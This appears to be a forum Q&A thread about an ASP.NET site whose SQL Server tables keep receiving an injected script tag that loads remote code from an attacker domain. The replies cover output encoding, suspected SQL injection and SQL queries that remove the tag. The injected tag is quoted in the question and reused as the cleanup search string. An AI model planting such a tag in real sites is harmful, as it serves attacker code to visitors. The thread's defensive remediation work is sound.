XSS Attack on the ASP.NET Website [closed]
I am in very big trouble. Please help!
My website has been attacked by some malicious script: `</title><script src=http://google-stats50.info/ur.php>`. This script is appended to column(s) of some tables automatically. I have removed this script, but after a few hours it re-appeared in some tables. This time it is `</title><script src=http://google-stats49.info/ur.php>`.
My client is complaining about the script. The technologies used are ASP.NET 1.1 and SQL Server 2005.
Please help.
Thanks in advance!!!!!!
When you render the text from the database, there are two ways to avoid this script running.
- Use Server.HtmlEncode(DataFromDatabase);
- Use the Microsoft Anti-XSS DLL library, which has a similar function with more options.
The latest MS Anti-XSS library version is now 3.1.
How-to video.
How they pass this script:
- On the contact or other forms.
- Via the browser referrer in your statistics: when they browse your site you keep a log of this, and when you go to view that log the script runs.
Hope this helps.
Shut down the site. Your server may or may not be screwed now.
You have to find out where the changes are coming from: the database or the file system.
If it's the DB then you may be OK; someone is probably using SQL injection. Set permissions so that the DB cannot be updated by the site for now, until you find the SQL injection point.
If it's your file system then you probably need to clear and reset the site. They are in and you won't get rid of them. Find your entry point, but it will be hard.
I would recommend that you remove all external host header bindings in IIS. That allows you to locate the problem locally without any client of yours being infected or stolen from.
A Quick remedy
The following is not a solution, but with it you can remove the script from the database in a single query. That's what I do for now :).
```sql
UPDATE Table_Name SET Column_Name = REPLACE(CAST(Column_Name AS nvarchar(MAX)), 'http://google-stats49.info/ur.php>', ' ')
```
This works like the find and replace in Word. If you find out anything about the whereabouts of the virus script, do post it here.
Regards, Masood
Same problem here... it started about 15:30 and infected 4 tables... here is a solution for a full database search: http://justgeeks.blogspot.com/2006/10/search-ms-sql-server-for-any-text.html (just edit it to return distinct table names).
And this will work, as Masood mentioned:
```sql
UPDATE Table_Name SET Column_Name = REPLACE(CAST(Column_Name AS nvarchar(MAX)), 'stupid script', '')
```
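As an added example that is not part of any answer above, this T-SQL script for SQL Server 2005 generalises Masood's single-column UPDATE to every character column in the database and searches for the whole injected tag from the question rather than only the URL. The `@marker` value is taken from the question; the variable names, the cursor and the dry-run switch are my own assumptions.

```sql
-- Strip an injected tag from every character column of the current database.
-- @marker: exact text to remove (here the string reported in the question).
-- @dry_run = 1 only prints the generated UPDATEs; set to 0 to execute them.
DECLARE @marker nvarchar(200);
DECLARE @dry_run bit;
SET @marker = N'</title><script src=http://google-stats49.info/ur.php>';
SET @dry_run = 1;

DECLARE @schema sysname, @table sysname, @column sysname, @sql nvarchar(MAX);

-- Only base-table character columns can hold the payload; computed columns
-- cannot be updated, so they are skipped.
DECLARE col_cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME
    FROM INFORMATION_SCHEMA.COLUMNS c
    JOIN INFORMATION_SCHEMA.TABLES t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('varchar', 'nvarchar', 'char', 'nchar', 'text', 'ntext')
      AND COLUMNPROPERTY(OBJECT_ID(QUOTENAME(c.TABLE_SCHEMA) + '.' + QUOTENAME(c.TABLE_NAME)),
                         c.COLUMN_NAME, 'IsComputed') = 0;

OPEN col_cursor;
FETCH NEXT FROM col_cursor INTO @schema, @table, @column;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Object names go through QUOTENAME; the marker itself is passed as a
    -- parameter to sp_executesql, so it is never spliced into the SQL text.
    SET @sql = N'UPDATE ' + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
             + N' SET ' + QUOTENAME(@column)
             + N' = REPLACE(CAST(' + QUOTENAME(@column) + N' AS nvarchar(MAX)), @m, N'''')'
             + N' WHERE CAST(' + QUOTENAME(@column) + N' AS nvarchar(MAX)) LIKE N''%'' + @m + N''%''';
    IF @dry_run = 1
        PRINT @sql;
    ELSE
        EXEC sp_executesql @sql, N'@m nvarchar(200)', @m = @marker;
    FETCH NEXT FROM col_cursor INTO @schema, @table, @column;
END
CLOSE col_cursor;
DEALLOCATE col_cursor;
```

This only removes the payload that is already stored; it does not close the injection point, which still requires the site's queries to use SqlParameter values instead of string concatenation, and the output encoding from the first answer to stop whatever is stored from rendering as script.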